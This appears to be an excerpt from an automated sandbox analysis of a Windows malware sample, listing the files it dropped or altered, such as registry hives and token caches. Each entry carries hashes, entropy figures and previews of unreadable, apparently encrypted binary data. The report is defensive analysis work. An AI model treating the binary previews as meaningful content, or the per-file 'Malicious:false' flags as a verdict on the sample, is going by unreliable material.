                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16718
                                                                                                                          Entropy (8bit):7.988517332462426
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:Uvk7o748j1DmuniH5BkXfejlwZpG0h5xW5yL9wRmR:Uvk7o74omrTkXfeJsGp5o6mR
                                                                                                                          MD5:B65F299D4485793D0B6B3C5231BED65C
                                                                                                                          SHA1:818DB34E0E942ACC755CEF14FE8AA259D9887637
                                                                                                                          SHA-256:521C8E18696444D1233DFFF3B3DAF799326CFAA6DCEF7DFB295CAC1163CB61C3
                                                                                                                          SHA-512:5C025E1AD76B1CFE93FFAFD8B9B1A66E8D291C644BD29FF8088E26078FACCE4D86B1AEE99D230F6F3E2EF66D4F633D6426037E94C819B538D33F5B95F0CEB44B
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......j..A..i.L.f^.5.#.+.%.Z.;..w...Z6d03M.k.....K.q6.Z9.:..4Y..t.Ru$R..vk.~...s.....&z..(..s.<@....l..~x....D(...o...wJp....G?.f..x...P....e..-&.P...]..hbc...~...&..D|E.N..j{..d....|5(.M9.}9k...n.1.6Abq..K.W.b.._...lZ.Lcr.}.....].Qy.}....8....=_>.t_Pk....+e..W.d.......5.o............#O...WQ.;W.\r..z..E=.1.e...m....g.N ..{.e2.K.....%o.......As.I.......^)\f....qx.!.L..m..$...:B...Y...$.D.1g4..TV..S^..U..Z..q.8..^..zW..H#a..4y..y..0..2.n...V...^2L.9.Y.sw..{....u..B/nrlz?QDx.3K.+*lk.^8.M........q.N.......A....p..T..y.ux....@...i'..p;..'....+'/.o+..RP...p...O../e......h..}.!.-...T4.Awc../...;mr7.../...;......NF."...j...n....<..3.......=.!X.|....K|.UR0c.......do.....}yNx...Fa.1.0..5D.....m..lks%@J.....V{S..... .?.-.._c..^....R.0..;....#!....W?.M|....x...P..q<.JH...Nux.......k.n$k..|r.|=F..,.aN.~3....H/.Io...A.....jG.U:.G.pAT...k.DH.j. ..@[....wx..$...y.xZgS.....C..>..`..o.Em.4.ym...zs...sf.[G..&-...m0.....g...V..s..s.,.8..n.-.. X.

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\User.dat

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8526
                                                                                                                          Entropy (8bit):7.980095630942914
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:8ld+mSbjMGKjrI7Gc/7JYzsmoqa4IeViHVH7dk9hizz2I:8ld+mSHc6R7JGQqieaVHxkkX
                                                                                                                          MD5:73966D2DB67B6EDB4A9F727F47CB7D4D
                                                                                                                          SHA1:34782B0B703A1AC875943A1C59E9D9E20FACEB47
                                                                                                                          SHA-256:EC26E48CB98E4F6D8DCFA8F0791C829BF7BE35C672A11128C7AEF0C5E3585563
                                                                                                                          SHA-512:56174EC7D6308D53433AE0D3881973BAACB6111AE95740B958CE3D1B6519A2114E994940DE609BE1017409EBC5CE1FC4C4D487DA9F1F72B63AD0BB7F45B3DA44
                                                                                                                          Malicious:false
                                                                                                                          Preview:regf.../.......).q~?Au...o1.2..|9)..p..6.4......)E..Fc.On._s..p.}...+...M.b. Hv..x.,W^..Ek....7...C....u....*.`.h...w..n.....(..>[..JPEX....Y..+..c\....D.....Y..N=vM34..j.'...X..<.9O...$."9y.Y~L..R6j...9....~Z.S.....T.<J...j.....t#^6t.1/8..]M].[.x.l}A......9^h......)(zF..z.&.h`..U.....=.o...c...0.!....d._n.X....k.A7f..R......X.n....#.>.>m..>..F;F..9..u..".{...1.'R@..I.~.Z^._....82..hI..8a>...0n.D.9. ....O....)O...J...W..K......=e..1cy.3.....}....lA....F$R.....d?..p...IQ.r.z_., Kk...n-g...9..../.Cd..GW.#.Gfh...../.........k..._.2.#E..J...H...-4J..g.}..AFg....yz9.p.V....(.%Yt.}+.{8.m.[.....o.........b.............kMz+....Iy^.........]u...,F._.cY.KF.+A6a..2..........ym.....`....%..i.z..Dx..~.....F.b....+.j....z..:...AH..x.....{.0.d...iq.&j{.k/.F.C.7.*...P8..h.+.'...Z...H.(..K.....A\..x...I..s..Bc.8..E.9.};LQ4....*)..,.....J.`..{7...T.v.....'IS.);D...c.W.B.c.FJ3....h(Q:..T..v).T.G:..+b.Y....W,O..r+@A...._R..[.6*./v6..H].\C...",.).T#T.Qd..a6j....;.d!.

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\User.dat.LOG1

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8526
                                                                                                                          Entropy (8bit):7.97878291232119
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ntbgZziaK6GVgiakKD3lMIXrhAjRse0ewDojd6SM7tGo:nr9gNeerW1s7ewK6tGo
                                                                                                                          MD5:A5BD64AEAB590502948043D30BC965BB
                                                                                                                          SHA1:9CFBD5B9A9F3099EE8047F384F86ADC8203CFF99
                                                                                                                          SHA-256:1922D6796CBA30E2235FD91FE7B1CB82A8E59F58C58EE3CF21CCB3410E7E4957
                                                                                                                          SHA-512:074D291DE94F342077803878BA536731DF58AF651B07358E2982B1BBCA99FCD208467D3C10A5CF036FE3E75B2E6F73C3B2535069640D0B7BA26C0AEDE1ED038D
                                                                                                                          Malicious:false
                                                                                                                          Preview:regf.'.N.Rv....@.g.....C.....:...x.{.X.#.....W.././......H.W...7.<..D...un..I.%W.`..};4.i.4.T..:[..{nu4.6.x GM... i.S.I.hM...U.xJ.J.8..`._.#..H.Z......c.{.q...[[<E....[..3^]{..h..W...eT}."...t)..fP.2..n....(...(.o..grb....M...:...........|.5..t...Ly.N.5..........c%\.T7....|%.h.....gG.h..$..,.....E...4..6.......?...oK...Hn.....Wgl..B....)Z._.......o`...Y.!.TZJ.d=F..Z.f....[..... k.1.Hm[.........".p....A.....8zU.k)...R...e.X......BTT`.Tp&6,.qKS...@....&...B..K..9..*...L..\H..o@i.6..+w....8..e.......$a...\.#...q...1....F.....I...T.E........;.._....Q.}....n....Q z.>...t..X.Rq.#.&..&q2 F..~.n.Y..?.....+|...+......|.....<.sq.....|*..Q....Zm...m.[....\.&Bl=I;..-.j.D.ZO....l......A*k...D... ..Nq.0.x....rHt..oX..Sjl.".t...Uw.[....c..s.2HA..k|..hZ....Z.Z.........|>....f.{=|K&..[n].`=...#...D...Q..3.._.bj.....S...^....g........64.7.M.B...I*..$.4Gg.{t..... .H4..u%z-fi......r;..fmM.8.FlV....."Xq... .4.f.vF.r......)NO..:..r[....4..1.._$0@...{.....v?9

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\User.dat.LOG2

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8526
                                                                                                                          Entropy (8bit):7.976194143204206
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:MAlDRJUwsjl1DfNA85DXDF75a1B08KaZGQ/sKW5kojumY1nC14uoF:MYNUxBfNZ6m8/GK8w1nCyJF
                                                                                                                          MD5:2A192C2E530BBD4A27604B38C978F739
                                                                                                                          SHA1:9D3AAA346258F62BCDDA211BEDA6EF4C2C149D7F
                                                                                                                          SHA-256:DBE1D8B15CA0B6AF87E197F439EFEEC6DF7F5B652FE89C85DB3B5EC692B99C8C
                                                                                                                          SHA-512:30E8F2116DC2F0481B8C3F4E2A68C65E76C9180CEE359F4110D33DA7C458C798B900829D5A5016FC8135A7A4F66CB1CDD52216D0CCA6F4CF39F872305F72DF8C
                                                                                                                          Malicious:false
                                                                                                                          Preview:regf..9c(.Q.....J../.ay.=F.{..f.c.G.&,....fM.\.c..Y......e....+0...j.z...s..z..\...u,).[c..YJ...a.h....q....."...........C.g.k..~....."O..i:....a...d.X......?$......4...f....q.%Q.N...f.......u..9.../.<.,..6.....I....b.B.3.#.xxt..vD...;...9...C.%P.QI...Q....zqv.....x8.y..L..B...p...d.}.....G...\.....mz9.%io.f..vL....LZ4S.&.^...I...e..m.0..k.g....%.iXT..0r..!.NER..........X."!W=.2.../..r.~..u.....[..X..3.(N/..F*...).....OC.9..X....r.(>.C@.~....!..EE...V"...MfMw.Bs.1...I...m.y....0.[...b.k"^....E5.00}w(?*S3fM......I....m...EL.......H..~5..(x..J|^k..%k.h5LSt..e@fV....Iv.:X.\.8.S.H...;r........(j../9.c#t,..b.&......[Yg.i..S..z`.BM....o.E...t..w.Y%.1..x.\:..)....j9..)x..c.3.Y..7.P..C...@...OAf.8.k..K.T{..q...s%..-..Y......:.......yM.x..^.B....m.t..b~.....w..l....JT.bM`.&H.S...I.J*.d.%c....s......a.P.L/0.;b....r.....y.<......M.wu...]^s/..d9%...CY...|.8..XKm.Fu.......N...X.....iTu]E@..Y.>'.|.+.4).....5..._.U...-c.Ag}..]..YgA.K.jqt..

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\UserClasses.dat

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8526
                                                                                                                          Entropy (8bit):7.978534771910979
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:AYF0kcwLNZWJnuU9DpzC7UevyNEHp21kQvfX:Ay0kTxAgU9NRevyNEJ6kwv
                                                                                                                          MD5:831E8E9AAC95B9A435B2DA225B2107BC
                                                                                                                          SHA1:15E81FCFC01059AE8A1AF53BD78D698D53866C2D
                                                                                                                          SHA-256:0B889369168AF50D936BDAE148AD8D3C397386710FFE28FDB0B1F5BF944BECCD
                                                                                                                          SHA-512:44F8E13F4EC651372736A356E75C41289F9A6BC3345F1EFCBD051367E52E797B91D867106D34CA880B629B6B904328CB7D57ED01517E919CE8EBDD115634D199
                                                                                                                          Malicious:false
                                                                                                                          Preview:regf..C........0L=9....+\..Hwv.#.U2.6Fg.P?...R.ti.,.=1O.9b...hlD.Bz.s..ba{_.b.-m........i55)...."w!.\......+w..Al.......g.4D.sT....F...:=...........H6t.o.....!.fsp..pN..x$..I8.4.NX&^Wf.>f1..$.v.?/........Lm......L........W.W..6.!..h.R):F.Bn....G..H.r.......m3...k........!..`=....b....2...F.]4..Q.N..)e?...2u.......8,.0....f.@x.9..[...z=4G.s.EA...jamf*.f9.h{.b...Q....R.[.>..3Nu..u.b.....dCf&.9.....o_......py....bY$...f...Od.(.I.....@...7B.4..\@s.3....ta.xbm..v..._...B.z.....-...T.~....d.q.......^....T$..d.]P,w.u...ed..x.a.k...w....."b.),...P..>......90.....]..6...>...&.bt.|..Jn/Y.H.i.zG.T.c...b..Qk..m.y....{x.....C.C..w.s...6A...^...d{)..K....}$.R..8...qUj'.[.[.9...P.#...n......._......8r............v9.}j.#...G...D.9.5..A6I..S".......*{...".........q.c..n.B...A.d...f.h.~.......#T....h._8:@n*.H..b.}..huBn.1......Z.!...$...s.%..%.`.F...K.....wQ.Ty..I>...X......<...x.l.l.M...ADuk.....m..[..6.F.V.q<..xP6(.>D..W..!]..O=.^..?.e..pB@..k*..7...

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\UserClasses.dat.LOG1

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8526
                                                                                                                          Entropy (8bit):7.977801188086213
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:susnqWKzO8xif+GS11+PJd991EeTbjkOhe7XrzAzU0LSv:b+wO8xifjwoPJL91XsnX/YLSv
                                                                                                                          MD5:3D03874D2EE22505B8C11EFC0622AF9F
                                                                                                                          SHA1:8324CDA37F8E40A9C457DBE6D081A0D4D5AF1A25
                                                                                                                          SHA-256:1E1EBFF8F6871009666288392F249D7C098FC16F8202E53025D9AC7508E7EA7E
                                                                                                                          SHA-512:3ED7EF4E4D66A7AC2AB728F0345E25468840E03B6AD3C2627C0BD3411263DB0F14AE6266E4AED490F528457E1D6810F675A77C5E48CA1F05D9006428C7B065E1
                                                                                                                          Malicious:false
                                                                                                                          Preview:regf.>..:a......P.G....I.d...l.6..../.,........Yd@....HA.`...b".........`4.Q^a;Oxg.}%.w9-0..N..Yg....i..%.1..#....!.......g\...!..ub..l.D..b..4.N.3.... ..'.+0../.!7.$,D...Lt.sh1.fK:>.+E..M9.x.I...c.o......[...t.8...l1q.( 2.....M.b.-..s...[.1....q....Lr...()....8.......{.]..#f.....N/......3C.....d..3..&......)|.M;....G..J.B.C.".Ug..X"1.Amm.".O....X..0d...(.t.:6ez.A.f.q..7.'4.L._=..N.*..?..Z..o.s.n.Y.[...BQ...P#.."7..yE...pv.=....\Am..y._^S^... o..>...:....).\....[o+..p.(.\ K.h...{f.VR..$....LF....;..*S....F.L....4..k..q.c..x7..5!...7...C.e.G.w[C..^x.V..0q........C.H6.2.S0.....qw<.A.~.......O.........cY1.........-...........I.L..`|v.....s(.~._...k.4...b..>E....?.'.v.R7..W~B.I.L...._..J..Z.p..m.^.F..............[..t=....?.i.cO.#{....b..........C...r,\...ZV0.1<..]............/.|.R.......gs2Hk.X..'..%.Jq6/...7.0ph......<.o..v......9R._9...mT.....e...J.........]...7)..fra.../......6,c.XxD.~6n.mng.Q..7.G...;.... ....H.p9.`h.......x..Q.....n../kC.

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1573198
                                                                                                                          Entropy (8bit):1.330490404448783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:UhK+zjTVWGKY+Zn7KxjIkYFfhNcZiJCDGHEnMR7yBxZVHsxqxWpbi+HhcOhraJ0I:Uo+z0Y+Z7UYFfh0KF97WVHsSb+BckM
                                                                                                                          MD5:76224E1D7F470A07DC21A906DC0762FE
                                                                                                                          SHA1:8593CE0E891FBEF6F79B867737844B6F3A19CEA4
                                                                                                                          SHA-256:B57FAE60B0D6C65E585AA50D234E7F3367D0CF71147E14699884DEE1CD4E3712
                                                                                                                          SHA-512:A5E08E796B974D6E25AF2ADDDFA539BB51715B29046396AC86F6D9D085070B387A692D51909A1E34F902743D68E68EB77B2DACA64A47326C724A2CA48CE234C5
                                                                                                                          Malicious:false
                                                                                                                          Preview:..4t.V...X....z.....q.u.*xH..;R..yC4Vn...........$w]...Fzu.`I..0M"V..x...c..%}.."..-....d....-.@.m....._.A.i.~J...V..%..k..M.I\lS.....9...bU...V.a...AB..2p...Ow...[!=.XF.z....l.a..?.9..OE|..y...j$n..../...?..)`..}.#d....~9k_.<[2..H.....3....P..}^.d.tO;f.RCj..1*3...?..q..T....El...R.1...u..4{*..<.A...a..Q.TX..r^........z.d...,.v..d....B.'.h..LXm/......B=*...@.3...v.?..T.1E&.....>.%<b.A.X..O..1...x.f+ks.<7. ..t.....d.V..s...-{.....[.$..%<#...y(.A7...^Wb...Z.W...a..06D....D...w.E....Q. .......f./Cc.Jo$..aL~.)$h.o.*.4..v..g/......'....L{.=.s~ZH.K%.. .\kf.9j..h.u..T...$.;d'mV.Uz9...p(.$xY(..;...c.#.,S]...[.P..i...P.....^T...t.X.o.q..0).i.S.U.`.'H.B.r..\..)....u.8P....,a..-..L?O..p.....]t..`.uyc~..L...udN..wm.t.a<..zL...w.~.....mOV...F...|'....q..+....5i..%=.=+2..u..a*.b.<...u...RG....v.Hy.b..a.t...T..%.....u...W...H-...A.5.]yfld.e..N-X..6.C.(....o.".,.%..s.I.1=...k.)....~'O..5...Ux.V:.#.G.+..$....[...H..a.....Mh...^W...0V.....PS

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.jfm

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16718
                                                                                                                          Entropy (8bit):7.989442557265587
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:SrZOLOZGKIhA7WWwZvV8pxf9Sexi7ttzkZ9obsaK8:SZOEmiaWTNQj5teubV
                                                                                                                          MD5:D63A8330F9286FCA011A169355FCA944
                                                                                                                          SHA1:2E3E796AA5A301FD31BFED2136CE5CD6F9B62FFD
                                                                                                                          SHA-256:6B6E9D435C9C5CAB0BDCD938E46F7BA70B14209103CF0324A33C60F0937CBA9E
                                                                                                                          SHA-512:0D67C57B4BCE448C5CC17B2BF02730B79F7E308F95BF3B07C1C945AC9E381F66122535959973BFF0DC2CF240F4939D221CC7AE865F64F69B672C3DFEF0F3CA51
                                                                                                                          Malicious:false
                                                                                                                          Preview:..}.."mK...:.?k...T^Y.^...~... p....4n..Ey*.......+..B8y.u3.gN&5.{.Z....)Mg.../.B_._AH......E!..L....(?....`..g.%..d.F.....L.3.......wd.vN.C......{....i?....0..........Y.e..[.7....^.&,......]K...x.....".bm.we.Y.)...?X".z...qy.c..8N.iH..w....f....v.-d:[&2kF[uv^.[..u.Z/k.bO.yv.......o.G..P2;H..Z.GXO7((c.j..n..M.....K.....^.D.dx.+.4/...eB#.../..\).i?p,.F.]..m....uA/....W.Mt...|..C....zDE. Y..o}d.^.....C|.Ek.m./.....Z..}.@/..>...r.'...Vz.j..S..!k]N....!.;_d ......s#.5.Vwv.n<*.Z..l[,oVyx.+..`..[.'X..Le....V.>..N....P+ODMj.7...~P.=.+z..p.b........|..j.c.w...q:q.O).j..R...1.X.S.&\.a..D..]6..m.........b...|.2k.V....{..-..3....z.(....BR2]p.P.A.6...J..%:8[..L..yb.c@..rr?...cB.4......k...,D)*.I...l!.._..G'n.L.R.N.W...vS*..S8V?..g.I..U.....,..H.$.E.X.w.^G...O.1..*'6i..Z#...d.C.2vd..L...=R....{.D.L.r..?..s.o.P.\NV.....IM.<}..K...2s..H.%x4.d,....z._GX..V.xj....vO".Y.E .....0'|..!+..g1...Y.~.y..*W..4z.^..M.u^gx.9........wA..!$....^.z~...H.....:.81...

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\778a09af-71b3-49bb-83e6-36722d62514f.6dfb6b5d-10db-4868-b4ad-ef207a2dda1b.down_meta

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1726
                                                                                                                          Entropy (8bit):7.880246588836452
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:WjoQCryJ+kUt6GCoZlU+1uCowhwLfbB0S2R8eXD:e+kUvRU+0vJLzB0SA8c
                                                                                                                          MD5:F83132B32F365DE05CDAE6FE59D4364A
                                                                                                                          SHA1:CDC404930B3774997F463E8DB8BA4907CB6E0AF3
                                                                                                                          SHA-256:D4DC6CD8CA30FC899B1E682FB0FB7306B9839B5A4B8B4D8FC02FB083E4A66B7B
                                                                                                                          SHA-512:0BC5C389589AF86FA94154700575E66D7D34EAEFB57A16FC0246CC3E64A32F83B7C8C974D33BD3DA5DECD2BD05F68F8661BE32FD25D422E0CB46C1D35794D525
                                                                                                                          Malicious:false
                                                                                                                          Preview:h.t.t........P$....H...;.. .,..1.E..;.x...I..lK.B...iYw."..@D.D......\L.........L..j....,Ew"#...".V:.......?.."3.W....@..P.3...O...R...>.:..L7-a..n..B.)p.K.0O.u........k/.A.?..)..id.GXB.\I.B=[g..;aF-.6>;]..{R..dK...*f...F.i...9~)r...8;.(.T_..z......lv.q.4..I....`Q..&.lyR..,4&Y..J..K.h..F=..TpM.w.}.|......!t.....N.....7"9.....-7&.Y.S{.N...j..Zm.....0...S.....PIh..6...I..G.rV..!...4...7...........'zmGx...o$5...t...7.hO..G..M....n...a*.v...E......%&VS.@.|.s1v.....}.,.^.\.......:..E.|.B.{.r..Nh!...T.~....&=.P..[...jb..*.......Q.`.G.y..r.O..7.!o.H....(..=...f]...ie.....~..,S......(#..rm ..}.c..7..............E...T.._....f....S.Q...".?...6...F..R(m>JC......oI..\...q..0..}.....9K.zp}.>....S6.;1._B..Z.>;.1.....F.....P. .F.q..Di.S.4......>.l.4..TBI7......a.6.Fe..~...x..U..8....u|O%...~.Yc..,.w=&...U....n.KT.....9UO.'s..A...:...^....<..f`..V(.....b)}......].R.....<01.63._.o..wA ...3.38....i).xn.....|.:..@a.5.A...,s..D{bz9zP.B2[....k...W.T.D@...[.

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\778a09af-71b3-49bb-83e6-36722d62514f.up_meta_secure

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1092
                                                                                                                          Entropy (8bit):7.810383140390705
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:0dGgEs5DDDB9XsuwySm7pe0zrHKeym5BvsbD:wGgEkHDMy98CrmmLvmD
                                                                                                                          MD5:22C9C3EFDF8FA504EBFF2E6140F138D3
                                                                                                                          SHA1:BA7EEA92C66F6F06A8CA0DA711913B46F22CD189
                                                                                                                          SHA-256:9C9A98BFD79196F544F2C61D476C6400B9772D764D67B02B7283EF5EFCFA9136
                                                                                                                          SHA-512:57E9724143C5493770F6732694038345E875150756B71ABCA497A45B0FD9D14A5502E24D90BF170AEB32559727F1E4FAC97980B1E0A0DD5377C351ADE4E7B04B
                                                                                                                          Malicious:false
                                                                                                                          Preview:........Q`.(...#.N..G.M\..t{d....tZ.}d..tiN_.FHv...k.V.b{...a&...s....]KvPOq..E&..g..R....*..0m..4$.=......2w.....n..$=V.$|![..r..6.B..T'.z....370r.....vd...y..Yc....{T.rN..&....#.g.L|..Z....T.Fso..5.*.R....x..R.B.sx...4........%n.f...6p..J.....R....~.......5O!J.D.n..p..A.E.....$..yA...I2'`...G...@...D..p.4......V..d.Mgj.=HGu...)Jn.j,T....&._>n.{.l..8d;C..%..\...~b]..y67.+.d.A.....uNT.....)......S..u...._.=.3........1.l.i...$9+.+.A'...$..@...8Wk...K..../6...%M...d...TI.3..,.bdC..Z.?..3A(............C......$d#H}dg,.\.}..A......Z.z.....A..9oy...c|t...2.O1X...X7........2.s"...t.....3.4. ..@...Q.....#.Rl.Z..3...m......x....@....x.......49...Kz....U#..s..].5.....\...p.........a..~.#..C.Y.t..A..\..Y.)..GA....../....X%i".T'.b.f5a..C...^.&....:..cW....C.b..........z....*.&...A.C\..bs...yNO..Cf.Q...D...U...I.8>....g..S.$.Z.P...4.....z.T.IG... g..b.57.q((u..V..@.,.m.Q.j...<....D..e Q..=.V}......8......|.)..%t..b.#......j...3...h~....O

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\TokenBroker\Cache\e71e1300703d5395820e448840a760f0dd25ad50.tbres

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3084
                                                                                                                          Entropy (8bit):7.93990421895724
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:k4R2HeXGzvPoUbRhZRyOYauKnjODprEMErAbdXab1TKUsMqQq0VHE8FFvv6y7+D:ke2tzvPJRhivSkPJGFxVdVNFH6y7G
                                                                                                                          MD5:2E2AA14FE877EB20F1080C04BF54574E
                                                                                                                          SHA1:45DEF04D83D693FA31B8B48F34F6ABA24B571072
                                                                                                                          SHA-256:87DB87D7D6DB5D1ADBFA11B7F83F19B7D22C54252A1018AC735BF4ACCC9FB23A
                                                                                                                          SHA-512:39051F35EA22507A3C1DCEBCCD425DB93F56B8BD0FD462F4F808FFCD66C1024D31D2C824007FFD4CC76B3B7F7A3B4275170B2E9365CC9B357CB5126450D42EB8
                                                                                                                          Malicious:false
                                                                                                                          Preview:{.".T.....1...V...V.w._.7Q.uR.U...5:.Q....`.6n...=l....J.q.$cj.......l../z../K<.....~..O.!....].......*T.........j3.}.X..&......=.C...v...0DO...<.u.....L../....Z.z.\.......{.&....y}vC....("w.,.....OY..,.4{.d`....!.....X.9.m..q:...~.D4..C.X..O...c1R. ..W6..E.".R.`..e...=`..).9OM.=n....C...........t#...q`.j{.,..3..0...b..6r.[....Q.d.zF.s.X.<..xv|..zKl..<...r.....OV.y^.R...!N2.$....[.E.5iLjI...5..d.....bd.u...`....!.RU.T....j...Y.,-..f.a'Wh..uV.(....O?.._...........l.Ye.1...A..?Nu..x0...r.....[0.zo.........N..W..&. .......`Z+.._($HL..,.....0<J[...P.K.........^qTM..V.gD.EcD. 4.....mQ8....x....x....%J....RvF.n.........Sd.!.m.N/...H...?.....,I...'j]...\..G.5..]....T...U..H..ncp..*.]<u..`[;....##..r(e!...G|S.S.._........v.V..ia....>.A.z....y ..o......V>f.w....|..._a.t.w.}h._...Ci..;kg.0&b..........1..............Q<..x..9......w+9..l.Z.D..q..X)..)..!..?W.y..@.K..{E..#>.9..,..R.v....B.M.<.(b.."....i.w...-.X._..HZ.xuv.....4.H.....hH....

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\95d9a2a97a42f02325559b453ba7f8fe839baa18.tbres

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3018
                                                                                                                          Entropy (8bit):7.941978239491332
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:CY0JDFts6ZcMz/+0furdvVS9WcAQOVv03N/ER/fiuKV69xwMeJLI4eSgeAD:CYSFO3URfuRvVemQOV898RyuKk9O6492
                                                                                                                          MD5:3471D21B1E794F123F4AABA118203FAE
                                                                                                                          SHA1:9F2ACAD75C800C956F559E8091B2B0C391DBE112
                                                                                                                          SHA-256:37F0CFF6886F67A6F9139E0A5F1B061311DD4E42F74D0F1DCE21E71B1EB0FA31
                                                                                                                          SHA-512:29F2F1DC933B03FDD11387A9B22CA70EDEAFAE2DC39B99F287E2834C8E63F148D03A74C02B0C6AAA3765101DD22A9A7B0BE76359C200BD81FE998DA2FA6E1DBA
                                                                                                                          Malicious:false
